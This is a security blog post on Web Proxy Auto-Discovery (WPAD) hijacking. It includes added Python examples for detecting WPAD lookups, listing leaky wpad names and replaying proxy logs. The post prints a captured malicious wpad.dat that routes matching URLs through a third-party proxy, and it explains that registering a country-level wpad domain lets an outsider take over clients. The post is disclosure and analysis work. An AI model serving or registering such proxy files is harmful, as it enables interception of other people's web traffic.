The mysterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part I


The network here at Sant’Anna School of Advanced Studies is quite complicated, so sometimes the only way to solve a connectivity problem is to open Wireshark and start looking around. As you may know, Windows boxes are quite chatty and they love to send out NetBIOS broadcast packets to resolve names, elect popes, fight back with anti-popes, and so on. But this time I noticed something strange in the broadcast jam: a PC was continuously trying to reach the nonexistent WPAD.SSSUP.IT machine.

I got curious, looked up what WPAD is, and found a couple of interesting things.

What the heck is this WPAD thing?

It turns out Internet Explorer developers thought an organization might wish to set up elaborate rules for web proxying. Therefore, they devised a way for network admins to autoconfigure IE proxy settings: the Web Proxy Automatic Discovery Protocol (WPAD). All major browsers currently support this feature. Note that many applications on Windows default to following IE proxy settings, so the Man-In-The-Middle potential is very high.

Basically, the browser issues a request for http://wpad.yourdomain.com/wpad.dat [1], which should contain a JavaScript-like function called FindProxyForURL. The function can use wildcard matching to specify different proxies for different addresses. All the gory details are available at www.findproxyforurl.com.

Exploiting WPAD

Things can get complicated if you have a subdomain (e.g. if your computer is called bob.office.yourdomain.com then wpad.office.yourdomain.com is tried too), but the key point is the same: if someone hijacks one of your wpad names, sophisticated Man-In-The-Middle attacks are possible. Since network admins often forget to set up a wpad host for their domain, Windows may try to query in multiple ways — even by broadcasting a NetBIOS request, which is trivial to intercept on a local network. [2]

Now, auto-configuration of network parameters is very useful. Tools like DHCP and transparent proxies are in wide use. However, this kind of auto-configuration brings risks: rogue DHCP servers can be transparent to users and possibly avoid detection. DHCP is a very well known protocol and network admins have long learnt to watch out for suspicious DHCP activity. WPAD is — in comparison — a somewhat obscure protocol. Buggy programs (and lax policies by domain registrars) create a sneaky exploit opportunity.
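As an added example that is not part of the original post: a small decoder for NetBIOS Name Service (NBNS) name queries that flags lookups for the WPAD name, i.e. the broadcast this post noticed in Wireshark and the kind of thing a network monitor would watch for the way it already watches for rogue DHCP. The packet it parses is constructed in the code rather than captured, and the function and constant names are this example's own.

```python
import struct

# Added example (not from the original post): decode NetBIOS Name Service
# (NBNS) name queries and flag lookups for the WPAD name. The packet built
# below is constructed here, not captured from a real network; the function
# names are this example's own.

NBNS_FLAGS_QUERY_BCAST = 0x0110   # opcode 0 (query), recursion desired, broadcast
NBNS_QTYPE_NB = 0x0020            # NetBIOS general name service record
NBNS_QCLASS_IN = 0x0001


def nbns_encode_name(name, suffix=0x00):
    """First-level NetBIOS encoding: the name is upper-cased, padded with
    spaces to 15 bytes and followed by a one-byte suffix; each of the 16
    bytes is then written as two letters 'A'..'P', one per nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return "".join(chr(ord("A") + (b >> 4)) + chr(ord("A") + (b & 0x0F)) for b in raw)


def nbns_decode_name(encoded):
    """Inverse of nbns_encode_name; returns (name, suffix)."""
    nibbles = [ord(c) - ord("A") for c in encoded]
    raw = bytes((nibbles[i] << 4) | nibbles[i + 1] for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def build_nbns_query(name, txid=0x1234):
    """Constructed NBNS name query: 12-byte header, one question whose name is
    a length byte (0x20), the 32 encoded letters and a 0x00 terminator, then
    QTYPE/QCLASS. Total length is 50 bytes."""
    header = struct.pack("!HHHHHH", txid, NBNS_FLAGS_QUERY_BCAST, 1, 0, 0, 0)
    qname = b"\x20" + nbns_encode_name(name).encode("ascii") + b"\x00"
    return header + qname + struct.pack("!HH", NBNS_QTYPE_NB, NBNS_QCLASS_IN)


def parse_nbns_query(pkt):
    """Return (name, suffix) for the first question of an NBNS query, or None
    when the bytes are not a well-formed single-question query."""
    if len(pkt) < 12 + 1 + 32 + 1 + 4:
        return None
    _txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000 or qdcount != 1:   # response bit set, or not one question
        return None
    if pkt[12] != 32 or pkt[45] != 0:    # label length and terminator
        return None
    encoded = pkt[13:45].decode("ascii", errors="replace")
    if any(not ("A" <= c <= "P") for c in encoded):
        return None
    return nbns_decode_name(encoded)


def is_wpad_query(pkt):
    """Detection check: does this NBNS query ask for the WPAD name?"""
    parsed = parse_nbns_query(pkt)
    return parsed is not None and parsed[0] == "WPAD"


if __name__ == "__main__":
    for host in ("WPAD", "FILESRV"):
        pkt = build_nbns_query(host)
        print(host, "->", parse_nbns_query(pkt), "suspicious:", is_wpad_query(pkt))
```

Fed with the payload of UDP/137 datagrams from a capture, is_wpad_query picks out exactly the lookups that a rogue host on the same segment could answer; the encoded form of WPAD (FHFAEBEECACACACACACACACACACACAAA) is also what shows up in the raw bytes in Wireshark.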

The DNS beast

As you might have guessed, Windows should stop short of the top-level domain .com in its quest for a wpad.dat. However, two issues come into play:

  1. On certain buggy versions, the global wpad.com/wpad.dat is requested. Now, the wpad.com domain has been taken by a (let’s hope) good guy, who chose not to serve a wpad.dat. But what about other Top-Level Domains (TLDs) like wpad.cz or wpad.it?
  2. Some countries (like Italy) allow you to register domain names right under their national suffix (e.g. our beloved School has sssup.it). Other countries (the United Kingdom, for instance) chose to mimic the global TLD structure, so their addresses look like google.co.uk, ox.ac.uk, and so on. Some even mix the two policies.

Combine these two facts, and you get a big mess. Issue #2 means that when you see a domain name it is very hard to tell which part is the TLD and which is the specific domain name. It is not immediately obvious, for instance, that pi.it is a global TLD (reserved for the Italian province of Pisa) while sns.it is the site of our arch-rival, the infamous Scuola Normale Superiore.

There is no “good” solution to this problem. Mozilla developers ended up creating a list of “Effective TLDs” [3] which the browser treats like global TLDs.

Each item on this list is an exploit opportunity for the WPAD bug. Just register the wpad.it domain and you potentially have control of all buggy machines with a .it name.
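As an added example (not code from the original post): a Python sketch of the name walk described in the subdomain example above and in this section, which lists the wpad names a client tries for a given machine name and marks the ones that sit directly under an effective TLD, i.e. the lookups that leave the organisation's own zone and could be answered by whoever registers wpad.<suffix>. The PUBLIC_SUFFIXES set is a constructed excerpt (a real check would load the full list from publicsuffix.org) and the function names are this example's own.

```python
# Added example (not code from the original post): enumerate the wpad host
# names a client walks through for a machine's FQDN and mark the ones that
# sit directly under a public suffix, where an outsider could register the
# name. PUBLIC_SUFFIXES is a constructed excerpt; the real list lives at
# publicsuffix.org. Function names are this example's own.

PUBLIC_SUFFIXES = {"com", "it", "cz", "uk", "co.uk", "ac.uk", "pi.it"}  # constructed excerpt


def wpad_candidates(fqdn):
    """Names tried when one label is stripped at a time with no stop rule:
    bob.office.yourdomain.com -> wpad.office.yourdomain.com,
    wpad.yourdomain.com, wpad.com (the last one is the buggy lookup)."""
    labels = fqdn.lower().rstrip(".").split(".")
    return ["wpad." + ".".join(labels[i:]) for i in range(1, len(labels))]


def is_public_suffix(domain):
    """True if 'domain' is an effective TLD according to the excerpt above."""
    return domain in PUBLIC_SUFFIXES


def classify(fqdn):
    """List of (candidate, inside_org) pairs; inside_org is False when the
    candidate is wpad.<public suffix>, i.e. outside the organisation's zone."""
    result = []
    for name in wpad_candidates(fqdn):
        parent = name[len("wpad."):]
        result.append((name, not is_public_suffix(parent)))
    return result


def safe_candidates(fqdn):
    """What a client that respects the effective-TLD list should try."""
    return [name for name, inside_org in classify(fqdn) if inside_org]


def leaked_candidates(fqdn):
    """The lookups that leave the organisation and could be hijacked."""
    return [name for name, inside_org in classify(fqdn) if not inside_org]


if __name__ == "__main__":
    for host in ("bob.office.yourdomain.com", "lab.sssup.it",
                 "pc1.comune.pi.it", "ws.cs.ox.ac.uk"):
        print(host, "safe:", safe_candidates(host), "leaked:", leaked_candidates(host))
```

Running it for a host under pi.it shows why the pi.it case above matters: both wpad.pi.it and wpad.it end up outside the organisation, while for a host under sssup.it only wpad.it does.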

Attack on Italy: the wpad.it mystery

You might think registrars would think twice before assigning a “wpad.country” domain. It turns out that sometimes this is not the case.

Some global wpad domains do exist and many of them serve a malicious wpad.dat. I’m gathering data and I’ll post when I have enough to make an interesting summary.

But take a look at this, the global wpad.it/wpad.dat:

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; }
        return "DIRECT";
}

What the hell is this? It appears the attacker is targeting some specific websites, but the wildcard is quite complicated. Any idea of what it might be?
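As an added example, not the post's own analysis: a Python port of the quoted FindProxyForURL that uses fnmatch to reproduce shExpMatch's glob semantics (it assumes case-sensitive matching), so the rule can be tried against URLs offline instead of reading the wildcards by eye. One thing it makes visible is that the first pattern is only a subsequence test: any http:// URL that ends in js and contains g, ad, nd, c, m, sh and ds in that order is sent to the proxy, so perfectly innocuous URLs can be caught too. The sample URLs are constructed for illustration and are not the attacker's real targets; function names are this example's own.

```python
import fnmatch

# Added example, not the post's own analysis: a Python port of the quoted
# wpad.it FindProxyForURL so its decision logic can be tried offline. PAC's
# shExpMatch is a shell-style glob ('*' any run, '?' one char); fnmatchcase
# gives the same semantics, assuming case-sensitive matching. Sample URLs
# below are constructed for illustration, not the attacker's real targets.

# The three patterns and the proxy string from the captured file, verbatim.
PAT_A = "http://*g*ad*nd*c*m*sh*ds*js"
PAT_B = "http*//*s*st*mp*tn*sk*p*"
PAT_C = "http*//*n*o.*"
PROXY = "PROXY 72.55.164.182:80; DIRECT"


def sh_exp_match(text, pattern):
    """shExpMatch equivalent: glob match over the whole string."""
    return fnmatch.fnmatchcase(text, pattern)


def find_proxy_for_url(url, host=None):
    """Straight port of the captured FindProxyForURL (host is unused there too)."""
    if sh_exp_match(url, PAT_A) or (sh_exp_match(url, PAT_B) and not sh_exp_match(url, PAT_C)):
        return PROXY
    return "DIRECT"


def required_fragments(pattern):
    """The literal pieces a URL must contain, in order, to match a '*' glob.
    For PAT_A this is just: http://, g, ad, nd, c, m, sh, ds, then a trailing
    js, with anything at all in between."""
    return [frag for frag in pattern.split("*") if frag]


def route(urls):
    """Map each URL to its proxy decision; handy for bulk-checking a URL log."""
    return {url: find_proxy_for_url(url) for url in urls}


# Constructed sample URLs (not real sites): they only exercise the patterns.
SAMPLE_URLS = [
    "http://www.example.com/script.js",                                      # no 'g' after http://: DIRECT
    "http://images.example.org/ads/landing/comments/share/feeds/widget.js",  # innocuous, yet matches PAT_A
    "https://assets.example.test/mp3/tn/desk/page",                          # matches PAT_B, not PAT_C
    "https://assets.example.test/mp3/tn/desk/photo.jpg",                     # PAT_B but excluded by PAT_C
]

if __name__ == "__main__":
    for url, decision in route(SAMPLE_URLS).items():
        print(decision, "<-", url)
```

When analysing a suspicious wpad.dat, replaying a day's worth of proxy-log URLs through route() tells you which of your users' requests the file would have diverted, which is more reliable than trying to guess the intended target from the glob alone.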

UPDATE: found this same file on wpad.cz, full analysis in progress.

UPDATE: a more in-depth analysis here and here

  1. Windows can also read its settings from DHCP and even from a special DNS entry. The official Microsoft documentation is somewhat sparse, but detailed information can be found in the draft submitted for standardization (previous version), in TechNet, in some knowledge base articles, and of course on Wikipedia. Another file which can be requested is wspad.dat, which has a different format.
  2. Even when a WINS server is present, naming your computer WPAD.YOURDOMAIN.COM might do the trick.
  3. Browsers need this list to enforce cookie restrictions (what if someone was able to set a cookie on all “.co.uk” domains?). The list is now publicly maintained at publicsuffix.org.


  • Eric Lawrence

    >On certain buggy versions,

    Can you be more specific? Would that be “Unpatched IE5.0”?

